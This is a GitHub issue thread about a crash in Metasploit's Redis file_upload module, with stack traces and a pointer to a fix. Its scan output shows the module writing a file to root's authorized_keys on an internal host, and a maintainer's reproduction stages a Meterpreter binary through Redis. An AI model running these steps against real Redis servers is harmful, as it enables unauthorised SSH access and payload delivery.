Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

auxiliary/scanner/redis/file_upload #7463

Closed
xl7dev opened this issue Oct 20, 2016 · 4 comments
Closed

auxiliary/scanner/redis/file_upload #7463

xl7dev opened this issue Oct 20, 2016 · 4 comments
Assignees

Comments

@xl7dev
Copy link

xl7dev commented Oct 20, 2016

msf auxiliary(file_upload) > run

[] Scanned 33 of 256 hosts (12% complete)
[
] Scanned 56 of 256 hosts (21% complete)
[] Scanned 86 of 256 hosts (33% complete)
[
] Scanned 106 of 256 hosts (41% complete)
[] Scanned 128 of 256 hosts (50% complete)
[+] 10.11.102.134:6379 - 10.11.102.134:6379 -- saved 402 bytes inside of redis DB at /root/.ssh/authorized_keys
[-] Auxiliary failed: NoMethodError undefined method split' for nil:NilClass [-] Call stack: [-] /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/redis/file_upload.rb:58:insend_file'
[-] /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/redis/file_upload.rb:164:in run_host' [-] /opt/metasploit-framework/embedded/framework/lib/msf/core/auxiliary/scanner.rb:135:inblock (2 levels) in run'
[-] /opt/metasploit-framework/embedded/framework/lib/msf/core/thread_manager.rb:100:in call' [-] /opt/metasploit-framework/embedded/framework/lib/msf/core/thread_manager.rb:100:inblock in spawn'
[
] Auxiliary module execution completed

@dmohanty-r7 dmohanty-r7 self-assigned this Oct 21, 2016
@dmohanty-r7
Copy link
Contributor

I was unable to reproduce with basic configuration. Here is how I ran it:

use auxiliary/scanner/redis/file_upload
set RHOSTS 127.0.0.1
set LocalFile data/meterpreter/metsvc.exe
set RemoteFile metsvc.exe

msf auxiliary(file_upload) > run

[+] 127.0.0.1:6379        - 127.0.0.1:6379        -- saved 61272 bytes inside of redis DB at metsvc.exe
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

@xl7dev, could you provide the options you set prior to executing the run command?

@xl7dev
Copy link
Author

xl7dev commented Oct 22, 2016

@dmohanty-r7

cat foo.txt|redis-cli -h 10.11.102.163 -x set foo
(error) READONLY You can't write against a read only slave

I have solved it in other ways.
Slave-read-only=1, default slave-read-only=0

@wchen-r7
Copy link
Contributor

@dmohanty-r7 Do you mind testing this patch? #7592

The way I see it, the problem is really because the module isn't using redis_command correctly. I also fixed other things that could potential break the sam way.

@dmohanty-r7
Copy link
Contributor

sure thing @wchen-r7

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

3 participants